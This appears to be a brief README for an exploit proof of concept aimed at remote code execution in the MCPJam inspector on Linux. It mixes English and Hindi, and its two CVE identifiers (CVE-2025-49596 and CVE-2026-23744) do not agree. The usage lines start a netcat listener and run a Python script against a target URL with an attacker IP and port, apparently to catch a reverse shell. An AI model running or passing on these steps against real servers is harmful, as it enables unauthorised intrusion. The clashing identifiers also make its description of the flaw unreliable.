
PoC for CVE-2025-49596 on linux targets
लिनक्स लक्ष्यों पर CVE-2026-23744 (1.4.2 से पहले के MCPJam inspector में RCE) के लिए स्वचालित PoC
# use netcat to run listener on any port like 9002.
nc -nvlp 9002
# use the automation like this
python3 CVE-2025-49596.py https://mcpjam-server.com <attacker-ip> <attacker-port>